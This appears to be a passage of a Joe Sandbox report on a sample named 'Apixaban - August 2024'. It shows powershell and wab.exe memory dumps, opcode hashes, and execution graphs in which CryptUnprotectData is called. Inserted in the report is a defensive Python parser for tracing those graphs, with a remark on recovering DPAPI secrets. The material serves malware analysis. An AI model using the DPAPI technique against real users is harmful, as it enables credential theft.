                                                • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                • Instruction ID: 052b7d625f743090f45407db0d4342bedadcdb208645d65a5e8033f28458e035
                                                • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                • Instruction Fuzzy Hash: 4DD05EB2400A20DAD3226B08DC009AFB3ACEF113107464466F841A21A5D7786D818BE9
                                                APIs
                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
                                                • lstrcmpiA.KERNEL32(00405CF3,00000000), ref: 00405AE1
                                                • CharNextA.USER32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF2
                                                • lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                • Instruction ID: 0e21c6ccf38cfde73736f548742f9065f02c2b70c8696d75456ee166b8786c13
                                                • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                • Instruction Fuzzy Hash: 59F0C231604458AFCB12DBA4CD4099FBBA8EF06250B2140A6F801F7210D274FE019BA9
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f115950dc2eb3cf59fab30204ae7b238cbccabbf5d96086f7c1b6599a99766b0
                                                • Instruction ID: d22d6efaab763e28e47119fc3d6b30e4caf4d630592b1f9eaa69a03fb7cc2159
                                                • Opcode Fuzzy Hash: f115950dc2eb3cf59fab30204ae7b238cbccabbf5d96086f7c1b6599a99766b0
                                                • Instruction Fuzzy Hash: AA318070B00204ABE7049B68C854FAFB7A3AFC9755F14C058E9026F795CF769C428BD2
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fc947cdb9a9258b66beed3d423b33806ddccc84f9d2163c9ec092d1822e8a1a5
                                                • Instruction ID: 1ade16cb92abf747acc6c391c62c62ef9a9514bae00531d19efc5dbcf4709543
                                                • Opcode Fuzzy Hash: fc947cdb9a9258b66beed3d423b33806ddccc84f9d2163c9ec092d1822e8a1a5
                                                • Instruction Fuzzy Hash: 7AC291B0B00204DFE724CFA8C454BAAB7B2AF95315F6481A9D905AF782CB76DD41CF91
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f83396feacea1739153b8687a6169e912c24bd0adf5064214cac2de7c6237320
                                                • Instruction ID: bd2e455502ba21cb718a64842affeb7708ab2e7f5000ad33c001f998418849c8
                                                • Opcode Fuzzy Hash: f83396feacea1739153b8687a6169e912c24bd0adf5064214cac2de7c6237320
                                                • Instruction Fuzzy Hash: 07726DB4B00215DFE714CF98C850BAABBB2AF89344F14C0A9D909AF751DB72DD81CB91
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f0cdf84a303ceb51709d54075c7f30502613787bbfe51d08bca94275d383c1fd
                                                • Instruction ID: 6a9d0e439aa4d3dc7cd088a62514a801356276238ca23e48066598ae6551570d
                                                • Opcode Fuzzy Hash: f0cdf84a303ceb51709d54075c7f30502613787bbfe51d08bca94275d383c1fd
                                                • Instruction Fuzzy Hash: 59625CB4A00204DFE714CF58C850FAABBB2BF89354F14C099D919AB791DB72ED81CB91
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 539f7ff92f84e2fd6c92d340484e0fe5313804d9b39daf8606fb3fff870e55c1
                                                • Instruction ID: 6574038f88890e97d20071e966c398439e4b1e8c40c222dd8aeb7e1ce14d81d1
                                                • Opcode Fuzzy Hash: 539f7ff92f84e2fd6c92d340484e0fe5313804d9b39daf8606fb3fff870e55c1
                                                • Instruction Fuzzy Hash: 41425BB4A00254DFE724CF58C840FAABBB2EF85344F15C099D919AB791DB72ED81CB91
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: facb55b037f406bd8e8025abc8a513f5ddbf86170d1e4db878153b556629a8ba
                                                • Instruction ID: 7d7d8bf4605bf19080ea43abf8e89c7f88c1bda2e81a5003c7a86b7d660daaf3
                                                • Opcode Fuzzy Hash: facb55b037f406bd8e8025abc8a513f5ddbf86170d1e4db878153b556629a8ba
                                                • Instruction Fuzzy Hash: 1B3207B4B003149FD714DF58C851FAAB7B2AF8A345F108099E909AF395DB72ED81CB91
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5ad64fd46fac9d8885586afb0b50cc32da356d5ca17d4d451f64fe1bc628b2d3
                                                • Instruction ID: f9ac1c651a71a82ea809fcbefdbe3678c165b53ad6914fabce1b3cb04943cfe4
                                                • Opcode Fuzzy Hash: 5ad64fd46fac9d8885586afb0b50cc32da356d5ca17d4d451f64fe1bc628b2d3
                                                • Instruction Fuzzy Hash: 6F2290B0B002099FD714CF98C854BAABBB2AF96714F25C06AE905DF391DB75DC41CB92
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eb789d448037196bd34fa71624213c780aeba97d8728abc91e4e648ff54bb264
                                                • Instruction ID: cf3defe2a262591b182d193b89fc138c4cf7c1a7776473c7bb1c7aa90a4671da
                                                • Opcode Fuzzy Hash: eb789d448037196bd34fa71624213c780aeba97d8728abc91e4e648ff54bb264
                                                • Instruction Fuzzy Hash: 2F121AB0B003149FD714DF58C850FAABBB2AF89345F148099E909AF395DB72ED81CB91
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 05b5f6bfe02e73def55ce19e10df960d49d3373dd631abcaf71be742e740ff28
                                                • Instruction ID: 6fdc0751d5de427555ba0c60d4d423effbadb151b19bd80eafadd5b17a3589f8
                                                • Opcode Fuzzy Hash: 05b5f6bfe02e73def55ce19e10df960d49d3373dd631abcaf71be742e740ff28
                                                • Instruction Fuzzy Hash: C9024DB4B00214DFE714CF58C840FAAB7B2EF89344F55C099E919AB791DB72ED818B91
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1af0a571e25f218c20ee6a681e3fecbebfb33ffadd96219a991d7e8b07a37b24
                                                • Instruction ID: a90a01292f202283ee098dd109627c5845f71a1fa534fd0685e8c51a41fce538
                                                • Opcode Fuzzy Hash: 1af0a571e25f218c20ee6a681e3fecbebfb33ffadd96219a991d7e8b07a37b24
                                                • Instruction Fuzzy Hash: D60217B4B003149FD714DF58C850FAAB7B2AF89745F108099E909AF395DB72ED81CB91
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c877a3010cca628a6b9fecb90f6f2b5d93f8c2e7a0ddac72b195c318e49ef607
                                                • Instruction ID: 388605998241ae90b56f7ac24c3e7b4310acd83c6e822c5a14e817b434a5a78d
                                                • Opcode Fuzzy Hash: c877a3010cca628a6b9fecb90f6f2b5d93f8c2e7a0ddac72b195c318e49ef607
                                                • Instruction Fuzzy Hash: C0E19DB0B002059FE714DFA8C850BAEBBB2AF89355F25C469D801AF795DB71DC41CB92
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 484c7aeb5dcf0a9de3b15b8789d0db35e14a197c6f34afe19a4718524dfb3189
                                                • Instruction ID: 8189c5d553c2087f18f5e7fc325537d232e71c339976857847a08a79bc5d19e3
                                                • Opcode Fuzzy Hash: 484c7aeb5dcf0a9de3b15b8789d0db35e14a197c6f34afe19a4718524dfb3189
                                                • Instruction Fuzzy Hash: AAE12CB0B00218DFE714DF68C854FAAB7B2AF86345F508099D509AF785DB71AD81CFA1
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5b191e445af957b48d962d2e2eeaf9ff6ecaa73751ee26bfd4458ed3d8ed7868
                                                • Instruction ID: b0cc144b103fe94358898f467ef2a1271d2e741cd78531cb368b6c790ca27318
                                                • Opcode Fuzzy Hash: 5b191e445af957b48d962d2e2eeaf9ff6ecaa73751ee26bfd4458ed3d8ed7868
                                                • Instruction Fuzzy Hash: AFC19DB0B003059FEB14CFA8C850BAEBBB2AF89355F15C059D805AF795DB75E841CB92
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 436798d96289930241ea57b3607e12c2ea7576486085cd8726087c2b25d9e6ce
                                                • Instruction ID: 07ad49b659d54ee261b7177b6a3e110ddbb9350f6ca13256b8f233fe12473e98
                                                • Opcode Fuzzy Hash: 436798d96289930241ea57b3607e12c2ea7576486085cd8726087c2b25d9e6ce
                                                • Instruction Fuzzy Hash: C17105B5B002199FDB149F6D98102BABBA3EFD5615F24807AC856DB341EB32C941CBE1
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 081e6b9f79891d5e6bef4bfed15938fa4ca1cede307d0b386636f03674b48f6a
                                                • Instruction ID: 0cf6fe5c5ec7bc6b529565216749bb954c88502bde1383e9421a6a340e54a941
                                                • Opcode Fuzzy Hash: 081e6b9f79891d5e6bef4bfed15938fa4ca1cede307d0b386636f03674b48f6a
                                                • Instruction Fuzzy Hash: 94518C7170435A8FDB255BAD98007A7BBA7AFD6325F14C07BD549CB281DA31C841C3E1
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7255b0facfec813a4dc13b57e486ef2a39f351e1d633c8a317f35b7e0713c9be
                                                • Instruction ID: 3afd9b6fc4106dbf4201ac760efc686edad410b6ae12fa802c091b30f3c4312f
                                                • Opcode Fuzzy Hash: 7255b0facfec813a4dc13b57e486ef2a39f351e1d633c8a317f35b7e0713c9be
                                                • Instruction Fuzzy Hash: D72179B130031E9BD7245A6E8801B3B77ABAFD5714F24C52AE506CB381CE76C84093E0
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a2d7eaeb51cb8a352f5ce01a7846f662201b0f5c93bb1d621ed37bfa543a020a
                                                • Instruction ID: d161bf690b0e15aa4036e181d4be9ea93767c72f2ef7ef67f298b0caf6d46f23
                                                • Opcode Fuzzy Hash: a2d7eaeb51cb8a352f5ce01a7846f662201b0f5c93bb1d621ed37bfa543a020a
                                                • Instruction Fuzzy Hash: BC216BF230838D6BD7245A6A58007767BB79F96310F28C56AE945CB2C2CA79C980D3E1
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b0a724d4f48c3773072b78044a77406f1f0e70a2905ed7431da52300e90b1f7b
                                                • Instruction ID: 3f32316acfa2ad01c0b293487dec246020c8ed229725d60c1033c93d92981eae
                                                • Opcode Fuzzy Hash: b0a724d4f48c3773072b78044a77406f1f0e70a2905ed7431da52300e90b1f7b
                                                • Instruction Fuzzy Hash: 1111E4B1A102199FDB149F7AC8002AEB7A6AFD8610B258065DC19EB340E730DD40DBE0
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bffd5550f21f1559d423cb29ee51bc3008597751f2a96b3842964f86f9a5f5c6
                                                • Instruction ID: 4f2da0804b658375e15b60be4b77e5a8888375f062d143603954bfc44789d6ef
                                                • Opcode Fuzzy Hash: bffd5550f21f1559d423cb29ee51bc3008597751f2a96b3842964f86f9a5f5c6
                                                • Instruction Fuzzy Hash: 150147F2B003654BE3211B7C1C51A6967029FC16A6F1000AACA01DF386DA21CC0383D7
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2244251587.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7830000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                                                • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40

                                                Execution Graph

                                                Execution Coverage:12.8%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:16.2%
                                                Total number of Nodes:37
                                                Total number of Limit Nodes:3
                                                execution_graph 17609 251e2a8 17610 251e2b4 17609->17610 17615 27787b78 17610->17615 17619 27787b77 17610->17619 17623 27787b69 17610->17623 17611 251e464 17617 27787b8f 17615->17617 17616 27788029 17616->17611 17617->17616 17627 27788431 17617->17627 17621 27787b8f 17619->17621 17620 27788029 17620->17611 17621->17620 17622 27788431 CryptUnprotectData 17621->17622 17622->17621 17625 27787b70 17623->17625 17624 27788029 17624->17611 17625->17624 17626 27788431 CryptUnprotectData 17625->17626 17626->17625 17628 27788440 17627->17628 17632 27788a68 17628->17632 17640 27788a59 17628->17640 17629 277884b0 17629->17617 17633 27788a83 17632->17633 17636 27788b41 17633->17636 17637 27788a68 CryptUnprotectData 17633->17637 17638 27788a59 CryptUnprotectData 17633->17638 17648 27788c4a 17633->17648 17652 277886dc 17636->17652 17637->17636 17638->17636 17641 27788a5c 17640->17641 17644 27788b41 17641->17644 17645 27788a68 CryptUnprotectData 17641->17645 17646 27788a59 CryptUnprotectData 17641->17646 17647 27788c4a CryptUnprotectData 17641->17647 17642 277886dc CryptUnprotectData 17643 27788d0d 17642->17643 17643->17629 17644->17642 17645->17644 17646->17644 17647->17644 17649 27788c5d 17648->17649 17650 277886dc CryptUnprotectData 17649->17650 17651 27788d0d 17650->17651 17651->17636 17653 27788ef8 CryptUnprotectData 17652->17653 17654 27788d0d 17653->17654 17654->17629

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 27788ef1-27788ef7 1 27788ef8-27788f6a CryptUnprotectData 0->1 2 27788f6c-27788f72 1->2 3 27788f73-27788f9b 1->3 2->3
                                                APIs
                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 27788F5D
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID: CryptDataUnprotect
                                                • String ID:
                                                • API String ID: 834300711-0
                                                • Opcode ID: bab35115a5cef3a8bca04fd366b98a2d317ba6573039d2890654aaa67b3dafdd
                                                • Instruction ID: ff2fcf252789bc75255da5b3daf6e4c37e8295f4b93302b299cc7da5e5a500c9
                                                • Opcode Fuzzy Hash: bab35115a5cef3a8bca04fd366b98a2d317ba6573039d2890654aaa67b3dafdd
                                                • Instruction Fuzzy Hash: 77116A76800249DFDB10CF9AC845BDEBFF5EF88320F148419E958A7210C775A951DFA5
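Added example, not part of the Joe Sandbox report and not code from the analyzed sample: a small Python parser for the flattened execution_graph and control_flow_graph token streams printed above, which rebuilds them into nodes and edges and answers the triage question a reviewer has at this point, namely which path from the graph entry first reaches a node that calls CryptUnprotectData. The sample input is the execution_graph line from this section copied verbatim (process 10, wab.exe); the grammar assumed is only what is visible on this page (a node id followed by an address or start-end range and optional label words, and src->dst edge tokens, with the CFG label "call <addr>" kept together), and the 64 KiB rounding that maps addresses onto the report's dump offsets 02510000 and 27780000 is an assumption of the example. One caveat worth reading off the API trace itself: in CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?) the third argument is pOptionalEntropy, so the blob being unprotected was protected without additional entropy and can be recovered by any code running in the same user context.

```python
"""Rebuild Joe Sandbox's flattened graph dumps and trace the path to a sensitive API.

Dump grammar as it appears on this report page (whitespace-separated token stream):
    <graph_name> ( <node_id> <address|start-end> [label ...] | <src>-><dst> )*
"""
from collections import deque

# Sample input: the execution_graph line of this report section (process 10, wab.exe),
# copied verbatim; node ids, addresses and labels are the report's own.
EXECUTION_GRAPH = (
    "execution_graph 17609 251e2a8 17610 251e2b4 17609->17610 17615 27787b78 17610->17615 "
    "17619 27787b77 17610->17619 17623 27787b69 17610->17623 17611 251e464 17617 27787b8f "
    "17615->17617 17616 27788029 17616->17611 17617->17616 17627 27788431 17617->17627 "
    "17621 27787b8f 17619->17621 17620 27788029 17620->17611 17621->17620 17622 27788431 "
    "CryptUnprotectData 17621->17622 17622->17621 17625 27787b70 17623->17625 17624 27788029 "
    "17624->17611 17625->17624 17626 27788431 CryptUnprotectData 17625->17626 17626->17625 "
    "17628 27788440 17627->17628 17632 27788a68 17628->17632 17640 27788a59 17628->17640 "
    "17629 277884b0 17629->17617 17633 27788a83 17632->17633 17636 27788b41 17633->17636 "
    "17637 27788a68 CryptUnprotectData 17633->17637 17638 27788a59 CryptUnprotectData "
    "17633->17638 17648 27788c4a 17633->17648 17652 277886dc 17636->17652 17637->17636 "
    "17638->17636 17641 27788a5c 17640->17641 17644 27788b41 17641->17644 17645 27788a68 "
    "CryptUnprotectData 17641->17645 17646 27788a59 CryptUnprotectData 17641->17646 "
    "17647 27788c4a CryptUnprotectData 17641->17647 17642 277886dc CryptUnprotectData "
    "17643 27788d0d 17642->17643 17643->17629 17644->17642 17645->17644 17646->17644 "
    "17647->17644 17649 27788c5d 17648->17649 17650 277886dc CryptUnprotectData "
    "17649->17650 17651 27788d0d 17650->17651 17651->17636 17653 27788ef8 CryptUnprotectData "
    "17652->17653 17654 27788d0d 17653->17654 17654->17629"
)


def parse_graph(dump):
    """Return (nodes, edges): nodes maps id -> (address, [labels]); edges is [(src, dst)]."""
    toks = dump.split()
    nodes, edges = {}, []
    i = 1                                     # toks[0] is the graph name
    while i < len(toks):
        if "->" in toks[i]:
            src, dst = toks[i].split("->")
            edges.append((src, dst))
            i += 1
            continue
        node_id, addr = toks[i], toks[i + 1]  # address is consumed unconditionally: it may
        i += 2                                # be all digits (e.g. 27788029 above)
        labels = []
        # Labels run until the next edge or node id; a CFG label "call <addr>" keeps its
        # target even when that target happens to be all digits (e.g. "call 2517118").
        while i < len(toks) and "->" not in toks[i] and (
            not toks[i].isdigit() or (labels and labels[-1] == "call")
        ):
            labels.append(toks[i])
            i += 1
        nodes[node_id] = (addr, labels)
    return nodes, edges


def api_nodes(nodes, api):
    """Sorted ids of the nodes labelled with the given API (the call sites)."""
    return sorted(n for n, (_, labels) in nodes.items() if api in labels)


def shortest_path_to_api(nodes, edges, start, api):
    """Breadth-first search from start; returns the shortest node path that ends at a
    node labelled with api, or None if no such node is reachable."""
    succ = {}
    for src, dst in edges:
        succ.setdefault(src, []).append(dst)
    prev, queue = {start: None}, deque([start])
    while queue:
        cur = queue.popleft()
        if api in nodes.get(cur, ("", []))[1]:
            path = []
            while cur is not None:
                path.append(cur)
                cur = prev[cur]
            return path[::-1]
        for nxt in succ.get(cur, []):
            if nxt not in prev:
                prev[nxt] = cur
                queue.append(nxt)
    return None


def region(addr):
    """64 KiB-aligned base of an address (or range start), formatted like the report's
    dump offsets. Assumption: the dumps are 64 KiB aligned, as 02510000 and 27780000 are."""
    return "%08x" % (int(addr.split("-")[0], 16) & ~0xFFFF)


if __name__ == "__main__":
    nodes, edges = parse_graph(EXECUTION_GRAPH)
    print(f"{len(nodes)} nodes, {len(edges)} edges, "
          f"{len(api_nodes(nodes, 'CryptUnprotectData'))} CryptUnprotectData call sites")
    entry = next(iter(nodes))                 # first declared node is the graph entry
    for n in shortest_path_to_api(nodes, edges, entry, "CryptUnprotectData"):
        addr, labels = nodes[n]
        print(f" -> {n}@{addr} {' '.join(labels)} (dump {region(addr)})")
```

Run as-is it prints the 37 nodes the report counts and the five-node path from the entry at 251e2a8 (dump 02510000) across into the 27780000 dump, ending at 27788431 where CryptUnprotectData is called; the same parse_graph handles the control_flow_graph lines below, whose "addresses" are basic-block ranges.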

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 6 277886dc-27788f6a CryptUnprotectData 8 27788f6c-27788f72 6->8 9 27788f73-27788f9b 6->9 8->9
                                                APIs
                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 27788F5D
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID: CryptDataUnprotect
                                                • String ID:
                                                • API String ID: 834300711-0
                                                • Opcode ID: acb8e551ae4d8a65442358a192c52181df7eb854fb28f18bdb828f4976d339d7
                                                • Instruction ID: 27918b012775043fa21cea8cdfe79f193abe47a6865d154e278b8fbf228bbdac
                                                • Opcode Fuzzy Hash: acb8e551ae4d8a65442358a192c52181df7eb854fb28f18bdb828f4976d339d7
                                                • Instruction Fuzzy Hash: 371129B6800249DFDB10DF9AC845BDEBBF5EF48320F108419E518A7650C379A950DFA5
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8d65f2b007223fa08d6366eefbb04a65dc5bb6a5dab0a115919b4072876e86a7
                                                • Instruction ID: 333f2512dc8f1d4d722a89edc819ba841c47f02e76bbda122049e37880baf788
                                                • Opcode Fuzzy Hash: 8d65f2b007223fa08d6366eefbb04a65dc5bb6a5dab0a115919b4072876e86a7
                                                • Instruction Fuzzy Hash: BC82AD70A01209DFEB16CFA8C584AAEBBF2FF88310F158559E8059B3A5D735ED81CB54

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
